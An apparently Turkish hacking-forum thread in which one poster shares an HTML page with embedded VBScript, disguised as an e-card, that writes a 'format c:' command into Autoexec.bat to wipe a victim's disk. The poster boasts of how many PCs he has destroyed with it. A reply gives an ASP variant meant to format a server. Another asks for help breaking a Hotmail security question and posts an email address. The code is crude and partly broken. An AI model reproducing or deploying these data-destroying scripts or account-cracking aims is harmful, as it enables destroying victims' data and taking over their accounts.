Mail İle Format Attırmak...

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    suskun19300
    suskun19300's avatar
    Erkek
    Aşağıdaki kodları html şeklinde kaydedip kurbana yollayın karşısına bir uyarı çıkacak uyarıya evet derse tertemiz bir pc onu bekliyo
    HTML haline nasıl getirebilrim ilk başta bir klasör oluşturun klasörün içinde sol tuş / Yeni Metin Belgesi tıklayın sonra kodları içine kopyalayıp index.htm şeklinde faklı kaydet deyin. Sonra Yeni Metin Belgesini Kapatın ve Klasöre gelin klasörde index.html Dosyası olacaktır sonra da karşı kurbana yollayın nasıl olsa ortalık salaklarla kaynıyor bu yöntemle kaç pc ucurduğumun sayısını ben bile unuttum Very%20Happy

<html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>ProHacKedan Sevgilerle..</title>
    </head>
    <body>
    <script language="VBSCRIPT">
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile("C:Autoexec.bat", True)
    a.WriteLine("format c: /autotest /u /q")
    a.Close
    </script>
    <p>Giriste acılan uyariya "HAYIR" dediyseniz <a
    href= "<i>javascript</i>:reload()">Malesef e-kart ınız calısmayacaktır.</p>
    </body>
    </html>

WwW.Ahmetin.GezeGeni.CoM
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fantasia
    fantasia's avatar
    Erkek

bende kaç kere denedim kesinlikle olmuyor. böyle bişey. neden aslı astarı olmayan şeyler yazarlarki buraya. aslında ben yanlış yaptım diyeceğim ama doğru yaptığıma da eminim. ama yinede olmuyor. bunun doğrusunu bilen bir arkadaş varsa bana yardımcı olur mu.

ha birde bana hotmail gizli sorusunu nasıl çözebileceğimi anlatabilecek bir dost varsa yardımcı olsun. bu benim için çok önemli.yardımlarınız için şimdiden teşekkürler. msn:mkahraman82@hotmail.com   bilenler lütfen beni msn'ine eklesin ve yardımcı olsun. ALLAH RAZI OLSUN.....

BLACKLINE
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MitNickKevin
    MitNickKevin's avatar
    Erkek

yazdığın kodlar asp kodları script tagları arasında çalışmaz çalışsaydı html formatında fso olurdu...

ama şöyle birşey var eğer bir serverda fso çalışıyorsa servera format atabilirsiniz valla benim hostda fso yok ama ben bi kere denedim galiba serveri retsetledi bi 10 dakika felan sitem açılmadı :)

<%
    Dim DosyaYaratma, Text
    Set DosyaYaratma=CreateObject ("Scripting.FileSystemObject")
    Set Text = DosyaYaratma.CreateTextFile ("c:\autoexec.bat", true)
    Respose.Write "mode con codepage prepare=((857) C:\WINDOWS\COMMAND\ega2.cpi)
    mode con codepage select=857
    keyb tr,,C:\WINDOWS\COMMAND\keybrd2.sys /id:179"
    Text.WriteLine ("FORMAT ATILIYOR")
    Text.WriteLine ("format a:/q/c autotest")
    Text.Close
    %>

Bilgi ceza, Bilgi suç ve Taşımak ağır. Unutmak ise öğrenmekten daha çok zaman alır...
Toplam Hit: 1835 Toplam Mesaj: 3